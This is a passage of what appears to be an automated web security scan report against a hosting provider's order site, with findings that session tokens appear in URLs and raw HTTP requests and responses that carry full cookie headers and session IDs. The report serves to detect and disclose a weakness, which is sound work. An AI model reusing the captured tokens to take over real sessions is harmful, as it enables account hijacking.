Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingRss

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingRss?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingWsb

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:41:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingWsb?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureToolsRatepoint

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:44:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureToolsRatepoint?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebdesignIstock

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureWebdesignIstock?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureWebspaceExplorer&amp;page=switch&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.68. http://order.1and1.com/xml/order/FirstWebsite

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FirstWebsite?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.69. http://order.1and1.com/xml/order/Gtc

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Gtc?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc
Content-Length: 0
Connection: close
Content-Type: text/plain


3.70. http://order.1and1.com/xml/order/Home

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.71. http://order.1and1.com/xml/order/Home

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
